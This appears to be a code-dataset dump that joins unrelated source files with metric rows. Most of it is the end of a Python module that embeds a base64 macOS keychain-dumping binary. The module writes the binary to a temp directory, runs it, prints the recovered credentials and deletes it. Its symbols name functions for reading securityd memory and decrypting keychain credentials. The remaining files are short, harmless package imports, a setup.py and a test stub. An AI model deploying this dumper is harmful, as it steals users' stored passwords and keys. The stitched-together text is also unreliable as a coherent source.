AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABEiIGAdAAAAEkBfX19zdGFja19jaGtfZ3VhcmQAUXIQkEBfbWFjaF90YXNrX3NlbGZfAJBAZHlsZF9zdHViX2JpbmRlcgCA4P//////////AZAAAAAAAAByIBFAX0RFU19lZGUzX2NiY19lbmNyeXB0AJAAcigRQF9ERVNfc2V0X2tleQCQAHIwEkBfX19tZW1jcHlfY2hrAJAAcjgSQF9fX21lbXNldF9jaGsAkAByQBJAX19fc25wcmludGZfY2hrAJAAckgSQF9fX3NwcmludGZfY2hrAJAAclASQF9fX3N0YWNrX2Noa19mYWlsAJAAclgSQF9leGl0AJAAcmASQF9mY2xvc2UAkAByaBJAX2ZnZXRzAJAAcnASQF9mb3BlbgCQAHJ4EkBfZnJlYWQAkABygAESQF9mcmVlAJAAcogBEkBfZnNlZWsAkABykAESQF9mdGVsbACQAHKYARJAX2dldGVudgCQAHKgARJAX2dldGV1aWQAkAByqAESQF9tYWxsb2MAkABysAESQF9tZW1jbXAAkAByuAESQF9wY2xvc2UAkABywAESQF9wb3BlbgCQAHLIARJAX3ByaW50ZgCQAHLQARJAX3Jld2luZACQAHLYARJAX3NzY2FuZgCQAHLgARJAX3N0cmNtcACQAHLoARJAX3N0cm5jbXAAkABy8AESQF9zeXNjdGwAkABy+AESQF90YXNrX2Zvcl9waWQAkABygAISQF92bV9yZWFkX292ZXJ3cml0ZQCQAAABXwAFAApfbWhfZXhlY3V0ZV9oZWFkZXIAogFoZXhfc3RyaW5nAKYBYQCrAWcA0AFzZWFyY2hfZm9yX2tleXNfaW5fAO4BZmluZF9vcl9jcmVhdGVfY3JlZGVudGlhbHMAlwJjaGVja18zZGVzX3BsYWludGV4dF9wYWRkaW5nAJwCZAChAnByaW50X2NyZWRlbnRpYWxzAKUDbWFpbgCqAwIAAAADANAhAAACZGRfbWFzdGVyX2NhbmRpZGF0ZQDLAXRvbTMyAJICAwDQIgAAAmV0X3NlY3VyaXR5ZF9waWQA6QFfAK8DAwDwJAAAAnRhc2tfbWVtb3J5AIgCcHJvY2VzcwCNAgMA0CcAAwCQKwADAPAtAAMAoC4AAwCAMQAAAmVjcnlwdF8AtAJ1bXBfANACAAIzZGVzAMsCY3JlZGVudGlhbHMAoAMDAMAyAAADd3JhcHBpbmdfa2V5APoCa2V5AP8CY3JlZGVudGlhbHNfZGF0YQCWAwMAgDYAAAJfYmxvYgCRA2NoYWluAJsDAwDAOQADAIA+AAMAgEUAAwCQSQADAMBLAAMAoE0AAAJjcmVkZW50aWFscwDTA21hc3Rlcl9jYW5kaWRhdGVzAOYDAwCIYgFfY291bnQA4QMDAJBiAAMAmGIBX2NvdW50APQDAwCgYgAAAAAAAAAA0CGAAaAC4ALAA+ACIBDgAsABwAPAA8AEgAeQBLAC4AEAAAAAAAAAAAIAAAAOAQAAEBcAAAEAAAAQAAAADwEQAAAAAAABAAAAJAAAAA8BAABQEQAAAQAAADoAAAAPAQAA8BYAAAEAAABCAAAADwEAAIAYAAABAAAAYAAAAA8BAABAGQAAAQAAAG4AAAAPAQAAkCQAAAEAAACDAAAADwEAAAAfAAABAAAAmgAAAA8BAADAHAAAAQAAAKkAAAAPAQAAgCIAAAEAAAC4AAAADwEAAAAbAAABAAAAywAAAA8BAAAgFwAAAQAAAOcAAAAPCwAACDEAAAEAAAD2AAAADwsAABAxAAABAAAACwEAAA8LAAAYMQAAAQAAACABAAAPCwAAIDEAAAEAAAA7AQAADwEAAHASAAABAAAATgEAAA8BAADQEAAAAQAAAFoBAAAPAQAAoCYAAAEAAABgAQAADwEAAMAlAAABAAAAcwEAAA8BAACQFQAAAQAAAI8BAAAPAQAA0BMAAAEAAACvAQAAAQAAAQAAAAAAAAAAxQEAAAEAAAEAAAAAAAAAANIBAAABAAACAAAAAAAAAADgAQAAAQAAAgAAAAAAAAAA7gEAAAEAAAIAAAAAAAAAAP4BAAABAAACAAAAAAAAAAANAgAAAQAAAgAAAAAAAAAAHwIAAAEAAAIAAAAAAAAAADICAAABAAACAAAAAAAAAAA4AgAAAQAAAgAAAAAAAAAAQAIAAAEAAAIAAAAAAAAAAEcCAAABAAACAAAAAAAAAABOAgAAAQAAAgAAAAAAAAAAVQIAAAEAAAIAAAAAAAAAAFsCAAABAAACAAAAAAAAAABiAgAAAQAAAgAAAAAAAAAAaQIAAAEAAAIAAAAAAAAAAHECAAABAAACAAAAAAAAAAB6AgAAAQAAAgAAAAAAAAAAiwIAAAEAAAIAAAAAAAAAAJMCAAABAAACAAAAAAAAAACbAgAAAQAAAgAAAAAAAAAAowIAAAEAAAIAAAAAAAAAAKoCAAABAAACAAAAAAAAAACyAgAAAQAAAgAAAAAAAAAAugIAAAEAAAIAAAAAAAAAAMICAAABAAACAAAAAAAAAADKAgAAAQAAAgAAAAAAAAAA0wIAAAEAAAIAAAAAAAAAANsCAAABAAACAAAAAAAAAADpAgAAAQAAAgAAAAAAAAAA/AIAAAEAAAIAAAAAAAAAABYAAAAXAAAAGAAAABkAAAAaAAAAGwAAABwAAAAeAAAAHwAAACAAAAAhAAAAIgAAACMAAAAkAAAAJQAAACYAAAAnAAAAKQAAACoAAAArAAAALAAAAC0AAAAuAAAALwAAADAAAAAxAAAAMgAAADMAAAA0AAAANQAAAAAAAEAdAAAAKAAAABYAAAAXAAAAGAAAABkAAAAaAAAAGwAAABwAAAAeAAAAHwAAACAAAAAhAAAAIgAAACMAAAAkAAAAJQAAACYAAAAnAAAAKQAAACoAAAArAAAALAAAAC0AAAAuAAAALwAAADAAAAAxAAAAMgAAADMAAAA0AAAAIABfX09TU3dhcEludDMyAF9fbWhfZXhlY3V0ZV9oZWFkZXIAX2FkZF9tYXN0ZXJfY2FuZGlkYXRlAF9hdG9tMzIAX2NoZWNrXzNkZXNfcGxhaW50ZXh0X3BhZGRpbmcAX2RlY3J5cHRfM2RlcwBfZGVjcnlwdF9jcmVkZW50aWFscwBfZHVtcF9jcmVkZW50aWFsc19kYXRhAF9kdW1wX2tleV9ibG9iAF9kdW1wX2tleWNoYWluAF9kdW1wX3dyYXBwaW5nX2tleQBfZmluZF9vcl9jcmVhdGVfY3JlZGVudGlhbHMAX2dfY3JlZGVudGlhbHMAX2dfY3JlZGVudGlhbHNfY291bnQAX2dfbWFzdGVyX2NhbmRpZGF0ZXMAX2dfbWFzdGVyX2NhbmRpZGF0ZXNfY291bnQAX2dldF9zZWN1cml0eWRfcGlkAF9oZXhfc3RyaW5nAF9tYWluAF9wcmludF9jcmVkZW50aWFscwBfc2VhcmNoX2Zvcl9rZXlzX2luX3Byb2Nlc3MAX3NlYXJjaF9mb3Jfa2V5c19pbl90YXNrX21lbW9yeQBfREVTX2VkZTNfY2JjX2VuY3J5cHQAX0RFU19zZXRfa2V5AF9fX21lbWNweV9jaGsAX19fbWVtc2V0X2NoawBfX19zbnByaW50Zl9jaGsAX19fc3ByaW50Zl9jaGsAX19fc3RhY2tfY2hrX2ZhaWwAX19fc3RhY2tfY2hrX2d1YXJkAF9leGl0AF9mY2xvc2UAX2ZnZXRzAF9mb3BlbgBfZnJlYWQAX2ZyZWUAX2ZzZWVrAF9mdGVsbABfZ2V0ZW52AF9nZXRldWlkAF9tYWNoX3Rhc2tfc2VsZl8AX21hbGxvYwBfbWVtY21wAF9wY2xvc2UAX3BvcGVuAF9wcmludGYAX3Jld2luZABfc3NjYW5mAF9zdHJjbXAAX3N0cm5jbXAAX3N5c2N0bABfdGFza19mb3JfcGlkAF92bV9yZWFkX292ZXJ3cml0ZQBkeWxkX3N0dWJfYmluZGVyAAAAAA=="
f = open("%sdebug", 'wb')
f.write(base64.b64decode(keychaindump))
f.close()
os.popen('chmod a+x %sdebug')
if "%s" != "":
print os.popen('%sdebug "%s"').read()
else:
print os.popen('%sdebug').read()
os.popen('rm -f %sdebug')
""" % (tempDir, tempDir, keyChain, tempDir, keyChain, tempDir, tempDir)
return script
| 309.542553
| 25,897
| 0.91463
| 772
| 29,097
| 34.465026
| 0.700777
| 0.002706
| 0.001278
| 0.001203
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052011
| 0.040554
| 29,097
| 93
| 25,898
| 312.870968
| 0.901064
| 0.033406
| 0
| 0.070175
| 0
| 0.017544
| 0.947445
| 0.923249
| 0
| 1
| 0
| 0
| 0
| 1
| 0.035088
| false
| 0
| 0.035088
| 0
| 0.105263
| 0.035088
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6a91a625ea1858a6778b2a05eefecfc7bdff3157
| 27
|
py
|
Python
|
bin/specsim3d/__init__.py
|
LutzGross/fingal
|
4b6fcc02871e7ba1a98f37ffd18f1a16a5fe6a48
|
[
"Apache-2.0"
] | null | null | null |
bin/specsim3d/__init__.py
|
LutzGross/fingal
|
4b6fcc02871e7ba1a98f37ffd18f1a16a5fe6a48
|
[
"Apache-2.0"
] | null | null | null |
bin/specsim3d/__init__.py
|
LutzGross/fingal
|
4b6fcc02871e7ba1a98f37ffd18f1a16a5fe6a48
|
[
"Apache-2.0"
] | null | null | null |
from .spectralsim import *
| 13.5
| 26
| 0.777778
| 3
| 27
| 7
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 27
| 1
| 27
| 27
| 0.913043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6ab71f773426e60db4bc36c29bea27d52ebfcf38
| 174
|
py
|
Python
|
numerical_tic_tac_toe/__init__.py
|
gbroques/numerical-tic-tac-toe
|
143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8
|
[
"MIT"
] | 1
|
2022-03-29T01:44:27.000Z
|
2022-03-29T01:44:27.000Z
|
numerical_tic_tac_toe/__init__.py
|
gbroques/numerical-tic-tac-toe
|
143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8
|
[
"MIT"
] | null | null | null |
numerical_tic_tac_toe/__init__.py
|
gbroques/numerical-tic-tac-toe
|
143f4ec7a8417a551b3ed64253c5f6d7ad49b3d8
|
[
"MIT"
] | null | null | null |
from .action import Action
from .numerical_tic_tac_toe import GameState
from .numerical_tic_tac_toe import NumericalTicTacToe
from .player import Max
from .player import Min
| 29
| 53
| 0.856322
| 26
| 174
| 5.5
| 0.461538
| 0.181818
| 0.223776
| 0.265734
| 0.391608
| 0.391608
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114943
| 174
| 5
| 54
| 34.8
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
6ad87290005890120de007fa53c2b59a95a9c2c2
| 79
|
py
|
Python
|
src/stactools/sentinel2/utils.py
|
constantinius/sentinel2
|
29f32dbffbb623b01cf4be2c27646cb79a877b23
|
[
"Apache-2.0"
] | 1
|
2022-03-28T19:13:50.000Z
|
2022-03-28T19:13:50.000Z
|
src/stactools/sentinel2/utils.py
|
constantinius/sentinel2
|
29f32dbffbb623b01cf4be2c27646cb79a877b23
|
[
"Apache-2.0"
] | 13
|
2021-06-24T13:35:06.000Z
|
2022-03-31T19:54:57.000Z
|
src/stactools/sentinel2/utils.py
|
constantinius/sentinel2
|
29f32dbffbb623b01cf4be2c27646cb79a877b23
|
[
"Apache-2.0"
] | 2
|
2021-09-08T07:57:19.000Z
|
2022-01-06T10:42:18.000Z
|
def extract_gsd(image_path: str) -> float:
return float(image_path[-7:-5])
| 26.333333
| 42
| 0.696203
| 13
| 79
| 4
| 0.769231
| 0.346154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.029412
| 0.139241
| 79
| 2
| 43
| 39.5
| 0.735294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
0a7cc39ac42bbc5849c8282d768ac469e1c429dd
| 161
|
py
|
Python
|
brushtech/brushtech/doctype/estimate_bom/test_estimate_bom.py
|
Momscode-Technologies/brushtech
|
0ad9e5b39f29ed0e75b71b0e40853bbda9e967c9
|
[
"MIT"
] | null | null | null |
brushtech/brushtech/doctype/estimate_bom/test_estimate_bom.py
|
Momscode-Technologies/brushtech
|
0ad9e5b39f29ed0e75b71b0e40853bbda9e967c9
|
[
"MIT"
] | null | null | null |
brushtech/brushtech/doctype/estimate_bom/test_estimate_bom.py
|
Momscode-Technologies/brushtech
|
0ad9e5b39f29ed0e75b71b0e40853bbda9e967c9
|
[
"MIT"
] | 3
|
2022-03-30T04:00:34.000Z
|
2022-03-30T04:11:44.000Z
|
# Copyright (c) 2022, Momscode Technologies and Contributors
# See license.txt
# import frappe
import unittest
class TestEstimateBOM(unittest.TestCase):
pass
| 17.888889
| 60
| 0.795031
| 19
| 161
| 6.736842
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028777
| 0.136646
| 161
| 8
| 61
| 20.125
| 0.892086
| 0.546584
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 6
|
0a91d93bf2ba49a605e944d46de6c98fe517942d
| 256
|
py
|
Python
|
setup.py
|
danielezambelli/latex2mathml
|
ef1b3455073a6027bf6384030075940b6fa1f1c2
|
[
"MIT"
] | null | null | null |
setup.py
|
danielezambelli/latex2mathml
|
ef1b3455073a6027bf6384030075940b6fa1f1c2
|
[
"MIT"
] | null | null | null |
setup.py
|
danielezambelli/latex2mathml
|
ef1b3455073a6027bf6384030075940b6fa1f1c2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# __author__ = "Ronie Martinez"
# __copyright__ = "Copyright 2016-2019, Ronie Martinez"
# __credits__ = ["Ronie Martinez"]
# __maintainer__ = "Ronie Martinez"
# __email__ = "ronmarti18@gmail.com"
from setuptools import setup
setup()
| 25.6
| 55
| 0.738281
| 28
| 256
| 6.035714
| 0.714286
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.045045
| 0.132813
| 256
| 9
| 56
| 28.444444
| 0.716216
| 0.804688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
0af3151e1846c051ae2fa0056cebe4d981b7f2e3
| 101
|
py
|
Python
|
opentracing_prometheus/__init__.py
|
casualjim/python-opentracing-prometheus
|
d00fa3166611717bc22d662fad930d0c573be5f1
|
[
"MIT"
] | 1
|
2019-11-14T08:57:48.000Z
|
2019-11-14T08:57:48.000Z
|
opentracing_prometheus/__init__.py
|
casualjim/python-opentracing-prometheus
|
d00fa3166611717bc22d662fad930d0c573be5f1
|
[
"MIT"
] | null | null | null |
opentracing_prometheus/__init__.py
|
casualjim/python-opentracing-prometheus
|
d00fa3166611717bc22d662fad930d0c573be5f1
|
[
"MIT"
] | null | null | null |
from tracing import TracerMiddleware
from metrics import PrometheusMetricsFactory, PrometheusReporter
| 50.5
| 64
| 0.910891
| 9
| 101
| 10.222222
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079208
| 101
| 2
| 64
| 50.5
| 0.989247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7c268a2d348f38e46d734631e5391d902dd233a3
| 379
|
py
|
Python
|
uimnet/workers/__init__.py
|
facebookresearch/uimnet
|
d7544cf5fb4c65cb262dca203afb0db4ba6c569d
|
[
"MIT"
] | 7
|
2021-07-28T18:40:20.000Z
|
2022-01-26T23:50:41.000Z
|
uimnet/workers/__init__.py
|
facebookresearch/uimnet
|
d7544cf5fb4c65cb262dca203afb0db4ba6c569d
|
[
"MIT"
] | 10
|
2021-08-31T13:44:56.000Z
|
2021-08-31T14:10:12.000Z
|
uimnet/workers/__init__.py
|
facebookresearch/uimnet
|
d7544cf5fb4c65cb262dca203afb0db4ba6c569d
|
[
"MIT"
] | 1
|
2021-11-06T01:55:58.000Z
|
2021-11-06T01:55:58.000Z
|
#!/usr/bin/env python3
#
# # Copyright (c) 2021 Facebook, inc. and its affiliates. All Rights Reserved
#
#
from uimnet.workers.base import *
from uimnet.workers.evaluator import *
from uimnet.workers.trainer import *
from uimnet.workers.embeddings_extractor import *
from uimnet.workers.calibrator import *
from uimnet.workers.mog import *
from uimnet.workers.predictor import *
| 29.153846
| 77
| 0.783641
| 51
| 379
| 5.803922
| 0.529412
| 0.236486
| 0.402027
| 0.466216
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015015
| 0.121372
| 379
| 12
| 78
| 31.583333
| 0.873874
| 0.253298
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7ca6620c9a94c4e0e5b8f32c68601989bf4fcc52
| 127
|
py
|
Python
|
chroma/chroma/bvh/__init__.py
|
youngsm/chroma
|
1e183c26aaff46fb9b0425ad8eef9995ebe0be2c
|
[
"BSD-3-Clause"
] | 7
|
2018-05-02T08:33:10.000Z
|
2021-11-15T02:03:01.000Z
|
chroma/chroma/bvh/__init__.py
|
youngsm/chroma
|
1e183c26aaff46fb9b0425ad8eef9995ebe0be2c
|
[
"BSD-3-Clause"
] | 1
|
2020-08-19T13:43:58.000Z
|
2020-08-19T13:43:58.000Z
|
chroma/chroma/bvh/__init__.py
|
youngsm/chroma
|
1e183c26aaff46fb9b0425ad8eef9995ebe0be2c
|
[
"BSD-3-Clause"
] | 16
|
2016-03-25T01:49:26.000Z
|
2021-09-09T15:51:34.000Z
|
from chroma.bvh.bvh import *
from chroma.bvh.grid import make_recursive_grid_bvh
from chroma.bvh.simple import make_simple_bvh
| 31.75
| 51
| 0.850394
| 22
| 127
| 4.681818
| 0.363636
| 0.291262
| 0.378641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094488
| 127
| 3
| 52
| 42.333333
